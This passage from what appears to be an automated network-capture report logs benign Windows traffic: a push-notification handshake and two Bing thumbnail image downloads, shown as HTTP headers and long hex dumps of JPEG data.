                                                                                                                                                                                                                                                                            2024-12-27 06:09:15 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 76 74 53 66 30 77 72 64 6a 55 2b 66 56 6d 30 72 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 36 34 66 31 31 38 37 66 34 39 38 65 33 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: vtSf0wrdjU+fVm0r.3Context: 8564f1187f498e3d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:16 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:16 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 77 61 77 69 69 59 4c 64 30 69 64 4f 55 53 62 42 48 51 42 49 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: BwawiiYLd0idOUSbBHQBIA.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            4192.168.2.649731150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC346OUTGET /th?id=OADD2.10239400728442_1ZZPG5YB8L69HFW32&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 683792
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: B41EFA29348A44D08B22DF27FBC7EAA8 Ref B: EWR30EDGE0119 Ref C: 2024-12-27T06:09:19Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:19 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a be 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 20 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 30 39 3a 31 33 20 31 30 3a 35 33 3a 34 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                            Data Ascii: JFIF``ExifMM*bj(1 r2i``Adobe Photoshop 25.11 (Windows)2024:09:13 10:53:488
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 2c 62 9a a9 52 aa 54 32 92 1f 45 39 52 97 15 9d ca 12 97 7e da 6b 52 31 a3 70 1f 9a 33 4c dd ef 49 9a 2c 17 1d 9a 4d d4 cd df c5 48 c6 9f 28 12 2b d5 bb 7a ce 53 57 2d 64 a9 94 74 2a 2f 52 f5 46 c3 6d 0b 25 49 95 6a c8 df 72 35 f9 a8 61 4f d8 94 b2 47 4a e1 62 bf f1 54 d0 ba ad 43 21 db 50 2c bf bc aa e5 b9 17 b3 36 61 7f dd d3 d5 ea 9d ae e6 8e a7 84 7e f2 b1 6b 53 64 ee 5c 8e a6 53 b6 a1 8d e9 f9 ac 1e e6 85 98 ce ea 95 6a a4 66 ad 46 6a 1a 34 4c 99 4d 2e fa 8f 34 d6 7a 8b 14 4a c6 a3 63 49 9a 46 34 c0 29 33 4a c6 a2 63 4e c0 2b 1a 8d 8d 1b bd e9 8c 6a 89 21 9a a9 5d 49 b6 ac 5c 3d 65 df 49 5b d3 46 12 7a 10 dd 4a ad 55 19 b6 d4 57 12 37 99 51 b4 b5 d9 18 68 73 4a 77 2c ef a3 1b aa 05 7a 91 64 db 55 ca 4f 30 ea 86 4a 76 ed d4 d9 0d 09 01 4e eb fb b5 46
                                                                                                                                                                                                                                                                            Data Ascii: ,bRT2E9R~kR1p3LI,MH(+zSW-dt*/RFm%Ijr5aOGJbTC!P,6a~kSd\SjfFj4LM.4zJcIF4)3JcN+j!]I\=eI[FzJUW7QhsJw,zdUO0JvNF
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 91 6b 9d 9b 21 ea 68 df 4d 63 b6 a2 69 28 e5 b8 f9 89 f7 d2 6f a8 1a 4a 8a 49 76 d1 c8 c5 cc 59 92 4a 8d a4 aa 92 4b 4c 59 6b 4f 66 43 a8 58 67 a8 fc cd b5 1e ed d4 d9 0d 69 ca 85 cc 4d e7 d2 79 de f5 52 47 a6 c9 2d 35 02 5c cb 5f 68 a7 79 f5 90 d3 fe f2 9e b7 35 a7 b3 32 f6 a5 cb 89 56 a9 c9 2e da 6c 92 ee a8 24 7a b8 c2 c6 52 9d c2 69 6a b7 9b fb ca 6d c3 d5 1b 89 76 ff 00 cb 4a ea 84 2e 72 ce a5 8b 53 5c aa fc b5 4d a5 dd 25 55 9a 5a 8f cd fe 25 ad e3 4e c8 e5 95 5b b3 45 65 db 27 cb 53 c7 26 ea cc 5b 8d bf 35 3e 3b 85 5f f9 69 52 e9 9a 46 aa da e6 aa cb b7 ef 54 b1 cb 59 2d 3a d3 a3 9d bc c5 ac dd 33 65 54 d8 59 ff 00 86 86 92 a8 c7 2f f1 53 9a 7d b5 97 b3 36 f6 85 a9 24 db 51 b4 b5 59 a6 dd 50 f9 ff 00 bc aa 54 c9 95 43 4a dd e8 aa 70 ca d4 54 ca 9e
                                                                                                                                                                                                                                                                            Data Ascii: k!hMci(oJIvYJKLYkOfCXgiMyRG-5\_hy52V.l$zRijmvJ.rS\M%UZ%N[Ee'S&[5>;_iRFTY-:3eTY/S}6$QYPTCJpT
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 47 3a 5c 5a 4f b7 c9 53 0f dc 6e 87 77 ef 51 dc ee c7 6c 70 4d 66 ea 1e 24 bc 96 fb fb 71 a4 82 ea e9 61 6b 6f b5 a5 ac 71 4a ea f1 ed df 26 c0 37 fb ee 27 fd aa e9 be 13 f8 df ec be 15 bb f0 8a c1 25 d5 ae a8 fb 92 de dd 17 74 d2 06 8c 26 fe 57 7a 1d a9 f4 db 8c 6d 18 ac 3d 0e de 7b 5b 5f f8 48 97 c8 fb 0c af 1f fa 5a 4f 1c 4c 97 7b 7f 85 15 cc 98 dc ee c0 11 b5 91 33 f2 d6 91 8b 5b 19 b9 77 35 2d 6e ec e5 f0 05 c4 70 ea 50 59 cd 67 aa 4d 6c f0 a4 ec ca 99 5d dc 7c a3 73 6e 6c 2b 1d bb 99 64 24 ff 00 15 73 76 37 1a 7b 49 fb b9 3c d5 57 66 de ff 00 2f ca 39 dd ff 00 8e fe 15 47 c3 fa 5b 5d 78 1e ee fa 6f f8 fe b5 d5 24 81 2d 26 75 6d ff 00 e8 b2 12 db 7a 9d 9e 5a e0 fd df 9b 8e 95 9b a3 b5 b3 5a cd 75 79 e6 34 31 44 cc fb 3f 81 46 7e 7f f6 be 6f c0 ff 00
                                                                                                                                                                                                                                                                            Data Ascii: G:\ZOSnwQlpMf$qakoqJ&7'%t&Wzm={[_HZOL{3[w5-npPYgMl]|snl+d$sv7{I<Wf/9G[]xo$-&umzZZuy41D?F~o
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: ba 24 47 be dc a9 1a b7 ca ad e6 aa b6 dc 0d 9d 7e ef 07 bd 45 e9 b5 ab fe be 63 b5 4e 88 f5 0f 1e 6b d6 da 8e 9a fa 7b 68 53 eb da 85 e2 45 a8 22 68 37 51 cb 6b cd d2 b2 89 37 ae 15 a3 f9 11 86 e5 df c8 eb 5c 7f c3 5f 16 e9 5e 39 f1 55 ba ea 90 78 56 c3 fb 4a e1 74 f9 61 79 d7 fd 25 bc c8 5d 64 8e 2d a7 e6 7f 92 13 8c 0f 9d f6 95 3b aa 7f 87 fe 06 f1 ee 97 e2 38 75 0f 16 78 87 c3 f6 0b 6e f1 cf 0c 5f da 2c cd 72 b1 b7 fa b7 54 3f 3c 7b 32 9d 7e 51 9c 77 dd d6 78 c3 46 8b 56 b5 bb 9a cf c6 fe 1c d1 24 b8 b6 dd 35 bd a3 ee 89 e4 12 74 f3 77 6e d8 cf b3 ee 8f 9d b9 c3 90 ad 59 7b 91 d1 4a fe 7a 97 79 b5 76 b5 38 af 03 e8 9f 6f ba d6 7c 2f e3 0f ed 5b 5b 7b 3b 4f b4 fd a2 18 1b 6a 49 22 ed fd fc 28 cc 3c b7 0d d9 be 55 84 82 7e f5 6d 78 da ce cf c3 5a 6a 2f
                                                                                                                                                                                                                                                                            Data Ascii: $G~EcNk{hSE"h7Qk7\_^9UxVJtay%]d-;8uxn_,rT?<{2~QwxFV$5twnY{Jzyv8o|/[[{;OjI"(<U~mxZj/
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: bd 0f 31 f1 b7 81 d7 4b d4 ae ef 9b cc bd d3 e5 87 ed cf 36 a7 6b 22 fd 8a dc c9 3b b7 91 b8 fc f3 47 f3 b1 43 9c a6 fc 93 fc 3c 9d e4 ba 1c ba 6a 6a 9f f0 94 49 75 6f a9 43 ba c6 d2 de d5 a5 6f 30 2c 8a f1 ac ae b1 ab 2e ef 90 fc bf 75 7e 5f 9d 57 3e b5 e3 2f 16 5d c1 e1 fb 7f 14 78 67 c1 1a c5 d5 e6 b9 e4 f9 33 4d 65 e7 c4 96 ed 1c 93 47 95 67 f9 a5 f9 d4 36 f1 cf f1 65 70 6b c2 fc 71 13 5a eb 9a 7d e6 a1 a6 c9 a6 fd b1 21 b1 bb fd c2 c4 bf 6d 8d 42 a9 4c aa b4 70 b2 79 2c bd 0e df 30 73 b3 34 2a 92 ea 68 a9 a6 f4 2d 58 f8 a2 ce ea d5 2d f5 4d 6b c4 71 4d e4 c7 03 db a6 a2 df 3a 86 0d f2 f9 8a e1 5b f7 90 f7 ff 00 97 6c 9d c5 ab d0 fc 3b f1 52 c6 ca 3b 4b 8b cf 1d ea ba 8d ad fa 2c f7 10 db c7 0c 53 e9 2a 9b db c9 5d aa 06 f6 dc ac cc 07 f7 00 dc 6b c4
                                                                                                                                                                                                                                                                            Data Ascii: 1K6k";GC<jjIuoCo0,.u~_W>/]xg3MeGg6epkqZ}!mBLpy,0s4*h-X-MkqM:[l;R;K,S*]k
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 27 f7 53 3d 2b aa cb 57 b1 cb ad d2 48 f1 1f 0c 78 37 4c b1 b1 fe d0 f1 4c 0e d1 ec ff 00 47 1b d9 af 2e 76 ec ff 00 55 12 fd c5 d9 22 1f 9f 90 39 0a 6b ab f0 dd a6 8b a8 df 5b f8 6f 49 d3 7f b3 b5 2b a4 91 6c 6e d3 73 2d b4 63 9f 35 a5 dc 3c c9 3b e7 f7 71 26 cf 4e 6b 8f 92 cf 53 f0 e7 9a d7 57 1e 6c d3 bf 9f 76 ef fe b5 db 87 f5 ff 00 eb fb 67 81 1f fc 25 77 96 52 79 33 5b dd 2d bd c3 c7 3b ba 6d 8a 57 c3 6e 52 85 81 d9 ed c1 1d f1 f2 d7 9c aa ab d9 2b 1e 83 a2 da bb 95 d9 d7 f8 ca c6 c7 c2 57 49 7d 6f e2 8f ed bb 8b c7 9b c9 78 b7 2a c2 db 40 93 ce 6d fb b2 b3 48 c1 76 ee 0c d0 bf 35 8f ae 3a f8 83 55 b8 d5 34 fd 36 4b 5b 7f 3a 6b bb 88 62 45 58 2d 95 71 f3 21 dd f2 ef 6f 30 94 ff 00 65 0e 5a b2 35 84 d5 75 7d 8b 71 06 db 7b ab e6 fb 25 ba 22 ee b6 5f
                                                                                                                                                                                                                                                                            Data Ascii: 'S=+WHx7LLG.vU"9k[oI+lns-c5<;q&NkSWlvg%wRy3[-;mWnR+WI}ox*@mHv5:U46K[:kbEX-q!o0eZ5u}q{%"_
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16067INData Raw: 6d 44 24 e3 ff 00 00 a9 a8 4a d6 36 bc 37 a5 78 5f 4e f1 32 78 46 1b 48 f5 e8 ef dd 65 fb 5e f6 89 ac b7 b3 bb 3c bb ff 00 77 19 f3 3a a3 29 6f 9f 1f 37 dc af 41 6f 0f ea 11 46 f2 68 37 76 ab 0d d5 a2 b4 2f 72 ec cd fe af 66 18 c6 7c b9 1b c9 f9 76 ed da df 2e 4b 61 eb e6 5f 89 7e 0b f1 ff 00 85 fc 23 fd b5 a3 f8 be 3d 53 4b b3 b9 5b c9 a1 b4 91 bc fb 69 9d bc c1 37 90 eb bf 1e a4 ee e7 9c 28 dc 07 59 f0 d7 e3 c5 f5 ef 88 d2 d7 c4 5a b7 d9 ec ee 9e 49 5f ed 08 d3 ec 9a 46 0c 98 8f cc 51 b0 b6 ee 87 6c 6b ee df 3a 9f bd b3 f5 26 9c 6d d0 ef fc 59 e1 ff 00 15 5e ea 53 5d 79 fb b5 08 a6 68 2e ed 2d 12 36 9e cb 7b 6d 66 fb 4d cc 42 39 21 fe 20 8d fc 2f d7 31 6e ac bd 2f c0 13 e9 1a 1e a7 0c 36 f2 6b 3a 5c a9 32 da 69 97 ce d0 7e fa 38 d3 74 8b e4 ee 8e 65 9d
                                                                                                                                                                                                                                                                            Data Ascii: mD$J67x_N2xFHe^<w:)o7AoFh7v/rf|v.Ka_~#=SK[i7(YZI_FQlk:&mY^S]yh.-6{mfMB9! /1n/6k:\2i~8te
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 35 af 31 8f c4 d3 c7 75 15 d4 df 33 41 13 41 12 27 ca a9 1b 32 16 c0 ff 00 b6 78 15 1d f7 8e e5 79 37 43 04 0c db 3e 7f c1 ab 9e 58 7a 8d ec 6d 1a d0 5d 4f 59 4b 88 1e 3f 35 64 4d bf de aa d7 9a 94 10 c7 e6 7d e8 bf bf fc 35 e4 97 9e 33 bc b8 b1 b7 86 1b 78 1b ca f3 3c ed 9f 2f 5d 9f 91 3f 30 a7 5a ea 1a fe a5 6a 97 17 17 f3 d9 db b4 2c a9 0b c7 f3 73 fc 5d 71 fc 5c 64 7f f5 d2 c2 cc 1e 22 07 51 ff 00 0b 1a 2f f8 48 ae b4 b5 82 07 9e dd 16 4f 29 27 dd f2 be d5 4c b0 18 ce ff 00 30 11 db f7 7f de a7 e9 ba f0 9f c7 17 16 6b a9 47 2c 6d 62 d2 ba 24 ca de 4b 24 98 5f fd 0f f3 fc 2b 86 d2 6c 2c 6c 24 be 9b 52 d4 a0 b8 bc d5 2e 21 b9 bb 77 91 57 7b 46 c4 c4 31 9f f5 7f 3f e3 bb 9a c1 bc d7 fc 27 a0 eb 0f 7d 63 a4 df 5e 5d 5c 45 ba 6b 8b 44 92 76 76 46 3f 33 f3
                                                                                                                                                                                                                                                                            Data Ascii: 51u3AA'2xy7C>Xzm]OYK?5dM}53x</]?0Zj,s]q\d"Q/HO)'L0kG,mb$K$_+l,l$R.!wW{F1?'}c^]\EkDvvF?3
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 28 36 ac bf 78 61 95 90 2f cc 98 6d dd 53 c4 f7 36 f7 5f b9 f1 9d 8d c4 9f d9 cd 14 c9 69 a7 49 2c 0f 76 59 0a 18 ce e6 5e 62 59 15 93 7b 15 de c7 ef 57 97 78 db e1 de b5 1c 71 5e 78 47 4d d4 56 6d 37 75 8d dd 8d a5 d4 90 79 39 50 fe 48 64 66 79 b6 33 61 be e8 f9 b8 de ac 0a f5 1e 1d f0 3f 83 9b c4 17 13 5f 6b 32 6a 37 56 16 ea b7 d6 3a 5a 48 ab 72 b0 c8 ee d2 cd 04 28 49 6d db 36 85 0a bb 90 81 9c ae 26 4e 3b bd 86 a2 ed a3 3b cd 36 5b 6d 7b 4d b8 55 d5 a0 45 b5 f3 22 bb 7d 2f 6c b6 cf d3 6f 94 d2 7f aa c6 cc 63 60 fb ff 00 8d 70 7e 34 f8 5d 79 e2 fb 1f b1 e9 77 f6 31 69 ac 91 b3 dd a5 d2 f9 b0 cd b8 2f cc ab 1f ef 15 f6 c6 70 ae a3 74 48 7a fc d5 d8 78 cb c3 f6 be 30 f0 8a 5b d9 c7 7d a5 c3 fb c9 21 4d 8b 62 a8 c1 64 f9 5e 06 1b 7c a2 1f 61 c4 41 86 cf
                                                                                                                                                                                                                                                                            Data Ascii: (6xa/mS6_iI,vY^bY{Wxq^xGMVm7uy9PHdfy3a?_k2j7V:ZHr(Im6&N;;6[m{MUE"}/loc`p~4]yw1i/ptHzx0[}!Mbd^|aA


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            5192.168.2.649730150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC375OUTGET /th?id=OADD2.10239400728441_1SJIWICR800Z51YH3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 679699
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 3339BD60FA7747CE80A1F9F706087FD4 Ref B: EWR311000104017 Ref C: 2024-12-27T06:09:19Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:18 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1b 28 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 20 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 30 39 3a 31 33 20 31 30 3a 35 33 3a 32 31 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                            Data Ascii: JFIF``(ExifMM*bj(1 r2i``Adobe Photoshop 25.11 (Windows)2024:09:13 10:53:218
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 37 91 f9 7e 4c bb 7e 7f e1 dd fd 2a e3 2b 11 28 dc ea 66 b7 8a c2 eb c9 fb 44 6d 6f 2f f1 a7 dd 7f f6 59 4f f1 55 5b 1d 3d 5e d6 68 d5 23 6f 2b ee 7f 0f cb fe c9 ff 00 e2 bf 3a 4f 0e cf 69 af 69 bf 61 b8 92 3b 59 99 f7 5b cc e8 bb 52 4f 46 3f dd 6f e7 5a 2d a2 35 8e 9b f6 88 e7 dc cb f2 cc 8f fe b6 d9 ba f4 fe 34 3f df 5a ae 5d 34 05 2d 75 dc c1 b8 b6 96 d7 7c 91 c7 27 ca fb 7f da 4f f7 96 ae 68 f3 f9 51 a2 f9 9b 63 df f3 bf d6 9b 1d ce fb a7 5b af 9b e4 db e6 a7 f2 3d 98 53 2e 2c 3e cb be e2 39 24 8a 3b 8d db 1f ef 2f d3 ff 00 ac 6b 24 59 b1 62 f7 3a 74 8f 36 97 71 03 2b 3f dc 7f ba eb fc 5b 94 ff 00 fa eb a2 57 d2 af fc 9b 88 64 fe cd d4 17 e5 b8 df 75 e6 af de fb db ba b2 f7 cf 6e b5 e7 f6 af 13 46 f0 c9 24 9b 57 fb ff 00 d3 35 a3 63 a8 2b 47 b6 68 fe
                                                                                                                                                                                                                                                                            Data Ascii: 7~L~*+(fDmo/YOU[=^h#o+:Oiia;Y[ROF?oZ-54?Z]4-u|'OhQc[=S.,>9$;/k$Yb:t6q+?[WdunF$W5c+Gh
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 64 b3 56 ae b2 ea d1 5a a8 cd 67 fd da ec 8d 6d 0e 29 d1 46 34 36 7f c3 52 7d 93 de b5 d6 0d b4 be 5d 0e a5 c1 52 48 c8 8e 16 1f f2 ce ad c7 15 5c 68 28 58 ea 5c ae 5c 61 62 b2 c6 b5 34 71 d4 cb 1d 3f cb a8 66 a9 58 2d e3 dd 53 f9 74 42 9b 6a 5c 56 32 dc b4 f4 19 e5 ee a1 63 dd 52 53 a3 a4 5d c6 2d b6 ea 99 62 d9 4f 8d d4 51 bb 75 46 a3 d3 a0 29 db 4f f3 69 b8 a6 32 52 e5 2b 98 9b 76 ea 29 aa 36 d4 91 d4 f2 d8 6a 41 8d d4 6d a9 23 15 2a 8a 92 ca cd 1d 31 a3 ab 98 a4 d9 42 60 53 68 e8 58 ea c3 25 23 55 12 41 20 55 aa 57 15 66 63 50 b2 6e ab 8c 4c db 2a b5 26 2a d7 95 51 48 36 d5 99 91 ed db 4e f9 69 1a 92 9f 28 73 03 1a 6e fa 29 18 6d a7 ca 1c cc 7a 9a 97 35 5d 4d 4d 1f cd 52 e2 90 d4 85 a7 2d 1b 7d a9 71 4a c5 5c 8e 41 51 34 75 6f 15 13 0a 04 43 b2 a3 64
                                                                                                                                                                                                                                                                            Data Ascii: dVZgm)F46R}]RH\h(X\\ab4q?fX-StBj\V2cRS]-bOQuF)Oi2R+v)6jAm#*1B`ShX%#UA UWfcPnL*&*QH6Ni(sn)mz5]MMR-}qJ\AQ4uoCd
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 5b 78 9e 39 5d 13 77 9a 8b eb b7 fd da 3f e2 5f 71 05 bd ac 31 c8 ab 2b c8 c9 f2 7d c6 3c 9a e8 6f 04 4b 7d 69 34 32 46 ab ff 00 2d a1 b8 7f bf f3 7f 03 f5 15 cd f8 a3 4e fe cb d4 6d 2e ad e7 ff 00 45 ba dd b1 1f 6e eb 69 37 7d c6 fe 62 b6 71 7c a6 2e 49 48 e9 35 ab 4f b1 e9 b6 3e 20 b1 92 4d b6 ee aa ff 00 c3 f2 ee fb a7 bd 75 9e 19 d6 e0 96 d7 6e a1 61 3d c4 3b 24 59 a1 de cd b2 3f f5 8a d1 49 cf dc f9 b8 6c fc b5 93 a5 ea da 63 68 ef 6f 6f 69 24 b2 32 6d 9a 17 fb bb 76 fd e5 c6 77 62 b0 3c 3f 73 3e 87 aa cd a7 df 5a 79 b0 b4 cd fe a7 e6 fb eb b8 32 fa e3 af d1 ab 58 4b d9 49 3b dd 32 67 1f 68 9d d6 a8 f4 29 3c 17 67 ad ed d5 34 7f f8 9b 43 bf fd 4d bb aa dd 22 9f 99 a2 5d df 5c 8f e1 dd f7 5b b5 67 78 82 2d 22 f2 37 d2 ee 27 92 e2 e2 d5 37 43 77 71 03
                                                                                                                                                                                                                                                                            Data Ascii: [x9]w?_q1+}<oK}i42F-Nm.Eni7}bq|.IH5O> Muna=;$Y?Ilchooi$2mvwb<?s>Zy2XKI;2gh)<g4CM"]\[gx-"7'7Cwq
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: d3 5e e2 f3 65 d5 d5 82 34 f6 33 4d 07 9b 14 d1 bf 05 65 db ce ee c4 af d4 d7 94 df 5b 69 eb e1 fb 8b c9 b4 9f b1 dd 5b ee 5f f4 47 66 9d 30 dc ef ce d6 db ff 00 01 6c d7 7f f0 ff 00 c7 36 d3 c7 0a db dd c8 b0 ec 68 ae 21 47 da c8 db b2 af f4 3f e7 8a db f1 12 45 79 e1 94 b8 b7 92 c6 de 66 76 59 ae 26 83 77 ee cf 5e 9f e7 35 52 7a 8a 27 cc 7a b4 97 da 1c fa 7e a5 75 1c 77 56 b2 c2 d1 43 e4 ff 00 1b 75 e7 1f c4 3d c5 7a 47 c2 fd 43 4a bf 9b 4f b8 b3 93 ec 57 96 f3 2c ef bd 37 33 fc bf 32 fa 72 bb ba ff 00 2a 7f 88 3c 31 aa de 4f 71 23 58 41 70 b6 b7 13 45 33 a4 0b b9 db a3 fa 7f 7b 8a e2 bc 33 65 16 8d 6a 97 16 be 64 b1 c4 ff 00 be f9 d9 65 87 fd ae 9f 77 ea b8 ac af 6d 3a 1a 2d 51 ea 5a d2 5c da e9 b3 34 32 41 7f f6 8d ca f6 9b 1b ed 50 e5 be 77 1c ff 00
